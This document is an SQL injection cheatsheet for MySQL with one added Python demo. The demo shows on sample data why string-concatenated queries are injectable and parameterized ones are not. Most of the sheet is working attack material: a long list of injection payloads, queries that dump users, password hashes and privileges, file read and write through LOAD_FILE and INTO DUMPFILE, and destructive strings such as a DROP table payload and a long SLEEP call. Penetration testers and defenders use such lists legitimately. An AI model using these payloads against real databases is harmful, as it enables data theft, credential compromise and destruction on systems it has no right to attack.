SQL Injection Cheatsheet_v1.0

SQL Injection in MySql
1' OR '1'='1
1 AND 1=1
If both inputs return the same result, the input is not being filtered and the database is vulnerable to injection.
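To show why the test above works, here is an added example (not part of the original cheatsheet): a lookup that concatenates the user input into the SQL text beside one that binds it as a parameter, run against a constructed in-memory SQLite table used as a stand-in for MySQL so it runs offline.

```python
import sqlite3

# Constructed sample data standing in for an application's users table.
# SQLite is used only so the demo runs offline; the point about how the
# query is built applies unchanged to MySQL.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT);
INSERT INTO users VALUES (1, 'alice', 'admin'), (2, 'bob', 'user'), (3, 'carol', 'user');
"""

def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def lookup_concat(conn, user_input):
    # VULNERABLE: the user-controlled value is pasted into the SQL string, so
    # quotes and operators in the input become part of the query itself.
    sql = "SELECT username FROM users WHERE id = '" + user_input + "'"
    return [row[0] for row in conn.execute(sql)]

def lookup_param(conn, user_input):
    # HARDENED: the value is sent as a bound parameter (data, not SQL); the
    # shape of the query is fixed and the input cannot alter it.
    sql = "SELECT username FROM users WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (user_input,))]

def tautology_check(conn, lookup):
    # The cheatsheet's test: compare a plain id against the tautology payload.
    # A concatenating query builder returns extra rows for the payload; a
    # parameterized one treats the payload as a literal id and matches nothing.
    plain = lookup(conn, "1")
    tautology = lookup(conn, "1' OR '1'='1")
    return plain, tautology

if __name__ == "__main__":
    db = open_db()
    print("concatenated:", tautology_check(db, lookup_concat))
    print("parameterized:", tautology_check(db, lookup_param))
```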
Dumping SQL tables
1. Get SQL version
SELECT @@version
2. Get Current user
SELECT user();
SELECT system_user();
3. List all database users (not system users!)
SELECT user FROM mysql.user;
4. List hash password for database users
SELECT host, user, password FROM mysql.user;
5. Now, you will want to dump all privileges in the databases
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs
SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- list user privs
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; -- list privs on databases (schemas)
SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges;
6. Dump DBA accounts
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';
SELECT host, user FROM mysql.user WHERE Super_priv = 'Y';
7. View Current database
SELECT database()
8. View all databases
SELECT schema_name FROM information_schema.schemata;
9. View columns
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema';
10. View tables
SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema';
11. Find a table by a column's name. For example, to find a table with a column called username:
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';
12. Select by row number.
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0;
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1;
13. Read local file.
UNION ALL SELECT LOAD_FILE('file location')
14. Write to local file
SELECT * FROM mytable INTO DUMPFILE 'file with location';
15. Get Hostname and IP address
SELECT @@hostname;
16. Create a new user
CREATE USER newuser IDENTIFIED BY 'pass1';
17. Delete existing user
DROP USER olduser;
18. Other Injections
'
"
/
/*
#
)
(
)'
('
and 1=1
and 1=2
and 1>2
and 1<=2
+and+1=1
+and+1=2
+and+1>2
+and+1<=2
/**/and/**/1=1
/**/and/**/1=2
/**/and/**/1>2
/**/and/**/1<=2
'or"='
' or'x'='x
"or"x"="x
')or x=x--
')or('x'='x
')or 1=1--
0 or 1=1
'0 or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0#
'or 1='1
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
1' OR '1'='1
'='
' OR 1 = 1 --
' OR 1 --
1 EXEC SP_ (or EXEC XP_)
x';--
\'; DESC users; --
1\'1
1' AND non_existant_table = '1
1 AND non_existant_table = 1
' OR username IS NOT NULL OR username = '
1 UNI/**/ON SELECT ALL FROM WHERE
' HAVING 1=1 --
' GROUP BY table.columnfromerror1 HAVING 1=1 --
' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 --
';DROP table sampletable;--
';SELECT SLEEP(200);--
UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename'
AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'